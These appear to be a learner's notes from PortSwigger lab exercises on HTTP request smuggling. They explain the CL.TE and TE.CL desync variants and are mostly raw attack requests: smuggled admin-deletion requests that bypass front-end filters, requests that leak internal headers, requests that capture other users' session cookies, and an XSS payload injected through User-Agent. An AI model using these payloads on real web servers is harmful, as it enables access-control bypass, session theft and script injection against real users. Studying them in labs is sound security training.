Note: This page was made as notes while learning HTTP Request Smuggling myself, using the Portswigger resources and labs
Description
HTTP Request Smuggling is possible when the parsing of Content-Length and Transfer-Encoding: chunked headers are different for front-end and back-end servers.
Types
Name
Front-end
Back-end
CL.TE
Content-Length
Transfer-Encoding
TE.CL
Transfer-Encoding
Content-Length
TE.TE
Transfer-Encoding
Transfer-Encoding
TE.TE: Transfer-Encoding front-end, Transfer-Encoding backend, but one can be tricked into using Content-Length by obfuscating Transfer-Encoding header
Impact
Smuggle HTTP in front of the next request by someone else
Smuggle another request through front-end to back-end to bypass filters
Types
CL.TE
POST / HTTP/1.1Host:your-lab-id.web-security-academy.netContent-Length:6Transfer-Encoding:chunked0G
The front-end uses Content-Length: 6 which sends the whole body (0\r\nG\r) to the back-end. The back-end uses Transfer-Encoding: chunked which will read the first 0 and then stop because this signals the end. When anyone now does another request to the back-end, the G is already sent and prepended to it making the request GPOST if it was a POST before.
TE.CL
Burp Suite automatically fixes Content-Length, but it only is correct for the back-end after splitting the request. So turn off "Update Content-Length" setting in Repeater
POST /post/comment HTTP/1.1Host:your-lab-id.web-security-academy.netContent-Length:4Transfer-Encoding:chunked61GPOST /post/comment HTTP/1.1Host:your-lab-id.web-security-academy.net0
The front-end takes Transfer-Encoding: chunked, so it sends the whole body to the back-end. Then the back-end takes Content-Length: 4 and only reads the first 61\r bytes. The back-end server responds that the request does not contain the right parameters but this does not matter. Next, the GPOST is also sent to the back-end and when anyone now makes another request to the back-end, it will respond with the already done GPOST answer.
Depending on whether the front-end or back-end uses the Transfer-Encoding, it can become either CL.TE or TE.CL
Solution to the lab:
First tested TE.CL, and with double Transfer-Encoding header got a proxy timeout. This could be because one of the servers is waiting for more bytes, but not getting them.
POST /post/comment HTTP/1.1Host:0a2d00fc03652cc4c04d3dae004e00af.web-security-academy.netContent-Length:4Transfer-Encoding:xTransfer-Encoding:chunked61GPOST /post/comment HTTP/1.1Host:0a2d00fc03652cc4c04d3dae004e00af.web-security-academy.net0
If the front-end uses Content-Length: 4 it only sends 61\r to the back-end. If the back-end then uses Transfer-Encoding it would see the 61 and wait for 97 more bytes, which it is not getting from the proxy causing a timeout. This would mean it is a CL.TE type instead. Trying the same with a CL.TE payload confirms this by solving the lab:
POST /post/comment HTTP/1.1Host:0a2d00fc03652cc4c04d3dae004e00af.web-security-academy.netContent-Length:6Transfer-Encoding:xTransfer-Encoding:chunked0G
Confirming Request Smuggling
CL.TE
Specify the requested location with GET /404, which will append cookies, etc. to the request making a GET CSRF
POST /post/comment HTTP/1.1Host:0ab8007103cb9890c061ef89005300ad.web-security-academy.netContent-Length:28Transfer-Encoding:chunked0GET /404 HTTP/1.1X:X
TE.CL
Same idea as CL.TE, with x= in the body because the 0 will also be prepended to the next request. A lonely 0 in the next request would not be a valid header, so it needs to be the body.
POST /post/comment HTTP/1.1Host:0a3d00e204916fbbc028023900de0074.web-security-academy.netContent-Length:4Transfer-Encoding:chunked9dGET /404 HTTP/1.1Host:0a3d00e204916fbbc028023900de0074.web-security-academy.netContent-Type:application/x-www-form-urlencodedContent-Length:30x=0
Exploiting
CL.TE
We can provide a complete HTTP request to prepend the next request by any victim. We can bypass front-end filters by sending an allowed request in the attack request, and an unauthorized request in the normal request that we smuggle. To make sure the headers from the original request don't interfere we can put it in a body like seen below:
POST /post/comment HTTP/1.1Host:0a81003103886215c0150d01000b0097.web-security-academy.netContent-Length:139Transfer-Encoding:chunked0GET /admin/delete?username=carlos HTTP/1.1Host:localhostContent-Type:application/x-www-form-urlencodedContent-Length:30x=
TE.CL
Same as confirming TE.CL
POST /post/comment HTTP/1.1Host:0abb004d04e98969c1810092007c00eb.web-security-academy.netContent-Length:4Transfer-Encoding:chunked86GET /admin/delete?username=carlos HTTP/1.1Host:localhostContent-Type:application/x-www-form-urlencodedContent-Length:30x=0
Leaking headers
Leak data in comment content. Put comment= last to make the next request get appended and read as part of the comment. Make sure to use long Content-Length but not too long.
POST /post/comment HTTP/1.1Host:0af200a104c3ef7bc068832d001b00ff.web-security-academy.netContent-Length:316Transfer-Encoding:chunked0POST /post/comment HTTP/1.1Host:0af200a104c3ef7bc068832d001b00ff.web-security-academy.netContent-Type:application/x-www-form-urlencodedCookie:session=Q9Ra3PMynaM4qv23aTWPITOPBaYvqYB9Content-Length:200csrf=YvyCU73Jt8tqxDbiZ11WaMbofDCpyVI7&postId=6&name=server&email=emal@d.d&website=&comment=leak
Use this header like before to make a request look like it was valid from the front-end
POST /post/comment HTTP/1.1Host:0af200a104c3ef7bc068832d001b00ff.web-security-academy.netContent-Length:211Transfer-Encoding:chunked0GET /admin/delete?username=carlos HTTP/1.1Host:0af200a104c3ef7bc068832d001b00ff.web-security-academy.netContent-Type:application/x-www-form-urlencodedContent-Length:30X-mxqMOU-Ip:127.0.0.1x=
Leaking cookies from other users
This type of attack can also be used to leak Cookies from requests from other users, by storing the data is a comment for example. The Content-Length needs to be perfect though, to find the entire cookie
POST /post/comment HTTP/1.1Host:0a560094034333f3c0a51a2c00dd0027.web-security-academy.netContent-Length:315Transfer-Encoding:chunkedContent-Type:application/x-www-form-urlencoded0POST /post/comment HTTP/1.1Host:0a560094034333f3c0a51a2c00dd0027.web-security-academy.netContent-Length:806Cookie:session=IyDgegJn5pvpxeO7vkMC1Iydonlav5jbContent-Type:application/x-www-form-urlencodedcsrf=4Aj33NnmRAndszvq5fEyTFBl9azQCxef&postId=3&name=name&email=email@d.d&website=&comment=leak
GET /my-account HTTP/1.1Host:0a560094034333f3c0a51a2c00dd0027.web-security-academy.netCookie:victim-fingerprint=zaSVR3HxS6nNgzvQkfktkk4dIrca0LI7; secret=YR3JdIRPEfOt8RibS8hhfRQphpxLFzeH; session=0ANQ8MLDM5n54ah26iXuhxKNERfTGtr3
Set headers on victim request to get XSS
POST /post/comment HTTP/1.1Host:0a2b004204969863c0e7238600e70055.web-security-academy.netContent-Length:79Transfer-Encoding:chunked0GET /post?postId=9 HTTP/1.1User-Agent:"><script>alert(1)</script>X:X